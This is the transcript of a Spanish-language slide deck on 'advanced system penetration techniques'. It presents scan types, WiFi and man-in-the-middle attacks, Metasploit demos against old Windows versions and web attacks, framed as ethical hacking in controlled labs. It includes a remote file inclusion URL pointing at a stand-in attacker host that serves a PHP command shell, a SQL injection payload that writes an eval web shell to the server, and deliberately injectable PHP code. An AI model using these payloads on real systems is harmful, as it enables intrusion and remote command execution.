Tecnicas avanzadas de penetracion a sistemas
-
Upload
rafael-seg -
Category
Documents
-
view
3.967 -
download
0
Transcript of Tecnicas avanzadas de penetracion a sistemas
![Page 1: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/1.jpg)
Técnicas avanzadas de penetración a sistemas
Ponente: Rafael Gómez Del Ángel
Aka : NoSfEr@tU
![Page 2: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/2.jpg)
HACKING ETICOLos hackers éticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.
![Page 3: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/3.jpg)
QUE ES UN HACKER
Experto en algún campo de la informática Conocimientos profundos de diversas
Plataformas (Windows, Unix, Linux, android). Conocimientos de redes Conocimientos de hardware y software.
![Page 4: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/4.jpg)
Pasos previos al ATAQUE
1. Reconocimiento• Pasivo• Activo2. Rastreo (escaner)3. Acceso• Niveles del Sistema• Redes• DOS4. Mantener el
acceso5. Borrado de
huellas
![Page 5: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/5.jpg)
FOOTPRINTING
Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting).
El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.
![Page 6: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/6.jpg)
FOOTPRINTING
1.- Obtener información inicial• whois• nslookup2.- Localizar el rango de red• Traceroute
![Page 7: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/7.jpg)
TIPOS DE ATAQUES
1.- Hacking WIFI2.-DOS3.-DDOS4.-M.I.T5.- Envenenamiento DNS6.-Reverse Shell7.-Port scaning
8.-Inyecciones SQL9.-R.F.I10.-XSS11.-Inyeccion de comandos arbitrarios12.-Hijacking13.-Cookie poisoning
![Page 8: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/8.jpg)
Hacking Wifi
![Page 9: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/9.jpg)
Definiciones
·BSSID ·IVS·SSID ·Mode monitor·AP ·WEP·STATION ·WPA·DOS
![Page 10: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/10.jpg)
·Hacking WEP ·Fake AP·Wifi DOS (A usuarios y sobre saturación de frecuencias)
Que Ataques analizaremos?
![Page 11: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/11.jpg)
Fake Ap método De
Ataque y contra Ataque
![Page 12: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/12.jpg)
DOS (Denial of service)En redes Wifi
*Sobre saturacion de AP
*Des-autentificacion infinita de usuarios
![Page 13: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/13.jpg)
Detección y AnálisisWardriving
![Page 14: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/14.jpg)
Escaneo de Puertos
El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal.Nos permite :ExplorarIdentificarComprender
![Page 15: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/15.jpg)
Técnicas
TCP connect ()
Reverse Ident
TCP SYN
Zombie scan
TCP FIN
ACK Scan
Null Scan
Xmas Scan
SYN/ACK Scan
Fragmentación TCP
TCP echo
UDP echo
TCP ACK
TCP SYN
ICMP echo
UDP scan
FTP bounce
scan
AbiertoMedio abierto Silencioso Barridos Otros
Tipo de escaneo
![Page 16: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/16.jpg)
TCP connect()La mas común de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCP
Intenta establecer conexiónSi conecta el puerto esta abiertosi no , el puerto esta cerradoSi no contesta esta silencioso
Muy rápido e invasivo y llamativo en exceso. * Miles de conexiones*Logs
![Page 17: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/17.jpg)
ComportamientoTCP connect()
Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPENHacker-------[ACK]------->[0] Puerto TCP Victima OPEN
Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSEDHacker<-----[RST]-------[X] Puerto TCP Victima CLOSED
Hacker------[SYN]-------[*] Puerto TCP Victima SILENT
![Page 18: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/18.jpg)
TCP SYNTécnica conocida como Half-open scan, escaneo medio abierto por excelenciase envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio de conexión y así burlar el registro del sistema como intento de conexión
*Discreto*Excelentes resultados
![Page 19: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/19.jpg)
ComportamientoTCP SYN
Hacker ---[SYN]---> [O] P. TCP abierto en la VictimaHacker <---[SYN/ACK]--- [O] P. TCP abierto en la VictimaHacker ---[RST]---> [O] P. TCP abierto en la Victima
Hacker ---[SYN]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
![Page 20: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/20.jpg)
ACK scanDestinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no.Envía paquetes ACK con números de secuencia y confirmación aleatorios.si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suyasi el puerto esta cerrado responderá RST pero si no responde es que esta filtrado.* Apoyo de un escaneo anterior*Variable del ping si responde RST esta vivo si no es in alcanzable.*Identificar firewall bloqueando SYN.
![Page 21: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/21.jpg)
ComportamientoACK scan
Hacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker <---[RST]--- [O] Puerto TCP abierto en la Victima
Hacker ---[ACK]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
![Page 22: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/22.jpg)
Null scan
Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso.
Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.
![Page 23: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/23.jpg)
ComportamientoNull scan
Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima
local ---[ ]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
![Page 24: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/24.jpg)
La razón
![Page 25: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/25.jpg)
POC Analizar 2 tipos de escaneo con la intención de evadir un firewall y obtener información acerca de los puertos abiertos.
![Page 26: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/26.jpg)
Ataques MIT1. DNS cache poisoning2. ARP Poisoning3. Phishing4. Sslstrip
![Page 27: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/27.jpg)
EXPLOTACION
![Page 28: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/28.jpg)
Escáner de vulnerabilidades
![Page 29: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/29.jpg)
Escáner de vulnerabilidades
![Page 30: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/30.jpg)
![Page 31: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/31.jpg)
EXPLOTACION
![Page 32: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/32.jpg)
MetasploitWindows Server 2003
![Page 33: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/33.jpg)
PenetraciónWindows Server 2003prueba de concepto
Puerto 4451. ms080672. Crear usuario3. Habilitar Escritorio Remoto4. Cambiar la contraseña del Administrador
OBJETIVOMostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.
![Page 34: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/34.jpg)
MetasploitWindows Server 2008 R2
![Page 35: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/35.jpg)
MetasploitWindows Server 2008 R2
•Numero de vulnerabilidad : ms09050•Encontrar el servidor verificando versión de smb•Explotar la vulnerabilidad •Denegación de servicios.
OBJETIVOMostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.
![Page 36: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/36.jpg)
MetasploitWindows XP SP3
![Page 37: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/37.jpg)
MetasploitPenetración a Windows XP SP3
Prueba de concepto
1. Encontrar la victima verificando versión de SMB2. Lograr la obtención de una reverse shell 3. Habilitar el uso de escritorio remoto4. Inyectar la conexión a escritorio remoto
OBJETIVOMostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.
![Page 38: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/38.jpg)
MetasploitWindows 7
![Page 39: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/39.jpg)
MetasploitWindows 7 Penetración
Prueba de concepto
1. Usar INGENIERIA SOCIAL
2. Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL
3. Vulnerar navegador web.
4. UPLOAD MI PATH C:\DESTINO\\Downloads
OBJETIVOMostrar el ataque de penetración a windows 7 en un ambiente controlado.
![Page 40: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/40.jpg)
Ataques WEB
![Page 41: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/41.jpg)
Ataques XSSAnalicemos la vulnerabilidad de xss
Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador
![Page 42: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/42.jpg)
Ataques XSS
![Page 43: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/43.jpg)
Ataques XSS
![Page 44: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/44.jpg)
Ataques XSS
![Page 45: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/45.jpg)
Ataques RFIRemote file
inclusionvulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto.
RFI se aprovecha del uso irresponsable de lasfunciones include y requiere, las cuales, debido al limitado conocimiento del programador ylas pocas o nulas validaciones que realiza antes de incluir una variable recibida porparametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scriptsprogramados para explotar dicha vulnerabilidad.
![Page 46: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/46.jpg)
Ataques RFIRemote file
inclusionhttp://www.victima.com/index.php?nav=pagina1phphttp://www.victimacom/index.php?nav=pagina2.php
<?phpprint system($_GET['command']);?>
http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls
![Page 47: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/47.jpg)
![Page 48: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/48.jpg)
Inyeccion SQL
union all select "<?php eval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"
![Page 49: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/49.jpg)
Analicemos este código
<?php$link = mysql_connect('127.0.0.1','root', 'pass');mysql_select_db('ejemplo', $link);$sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);if(mysql_errno($link)){ echo mysql_error($link);exit;}while($row = mysql_fetch_assoc($sql)){ echo $row['id']."".$row['titulo']."".$row['contenido']."".$row['parent'];}?>
![Page 50: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/50.jpg)
Busqueda de tablas.
![Page 51: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/51.jpg)
Prueba de concepto
OBJETIVOMostrar el ataque de inyección SQL y la técnica de intrusión de SHELL en un ambiente controlado.
![Page 52: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/52.jpg)
EL RESULTADOllegando a una
conclusión
![Page 53: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/53.jpg)
El resultado.
![Page 54: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/54.jpg)
![Page 55: Tecnicas avanzadas de penetracion a sistemas](https://reader038.fdocuments.ec/reader038/viewer/2022102806/557b0b79d8b42a83118b467e/html5/thumbnails/55.jpg)
GRACIAS
Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU